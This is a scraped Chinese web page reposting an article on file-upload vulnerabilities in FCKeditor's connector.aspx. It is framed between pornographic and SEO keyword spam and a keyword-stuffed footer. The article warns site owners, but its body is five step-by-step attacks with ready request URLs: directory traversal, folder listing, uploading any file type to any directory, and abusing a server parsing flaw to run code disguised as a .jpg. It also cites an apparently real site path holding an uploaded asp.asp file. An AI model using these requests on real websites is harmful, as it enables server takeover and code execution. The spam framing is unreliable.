国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 開發 > 綜合 > 正文

網頁編輯器FCKeditor 新聞組件的一些程序漏洞

2024-07-21 02:53:29
字體:
來源:轉載
供稿:網友
很多網站可能都在用FCK的新聞編輯組件,使用FCK的時候一定要注意版本是否安全,以下是FCK中的文件上傳漏洞:(主要是:connector.aspx文件的漏洞)
 
1 CurrentFolder 參數,可以在網站中不同目錄新建文件夾,參數使用 ../../來篡改參數,進入不同的目錄 
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=aspx.asp 


2 CurrentFolder 參數,根據返回的XML信息可以查看網站所有的目錄,比如 “../../../”進入不同的目錄,讓后通過XML返回的消息就可以看到沒有權限的頁面browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F 

3 上傳文件時,通過修改CurrentFolder參數,可以將文件上傳到不同的目錄 
/browser/default/connectors/aspx/connector.aspx?Command=FileUpload&Type=Image&CurrentFolder=%2F 

4 同時修改Type 和CurrentFolder 參數,可以上傳任意類型文件到網站任意目錄,基本上網站就完蛋了。 
/browser/default/connectors/aspx/connector.aspx?Command=FileUpload&Type=Image&CurrentFolder=%2F 

http://samsungfriend.local.opentide.com.cn/upload/fckroots/Image/asp.asp/asp.asp 



5 通過創建文件夾的功能,創建名字帶有.aspx的文件夾,如:file.aspx等,利用文件解析漏洞,在該文件夾下上傳有代碼的.jpg 或.rar等文件(實際文件是.aspx,把文件名該后綴),上傳之后就可以利用漏洞執行代碼了。 如:www.xxx.com/upload/file.aspx/123.jpg 輸入之后,代碼被成功執行。

注:相關教程知識閱讀請移步到編輯器頻道。
發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 聊城市| 石狮市| 龙门县| 临武县| 阿鲁科尔沁旗| 惠安县| 宁夏| 宣武区| 东莞市| 海安县| 都江堰市| 南漳县| 咸阳市| 怀柔区| 海原县| 五家渠市| 如东县| 灌云县| 梁平县| 阳西县| 黑山县| 大理市| 长垣县| 龙江县| 贵德县| 长汀县| 正安县| 大足县| 重庆市| 牡丹江市| 措美县| 江北区| 遂溪县| 麻城市| 开鲁县| 普兰县| 肇东市| 惠州市| 桃江县| 红安县| 旌德县|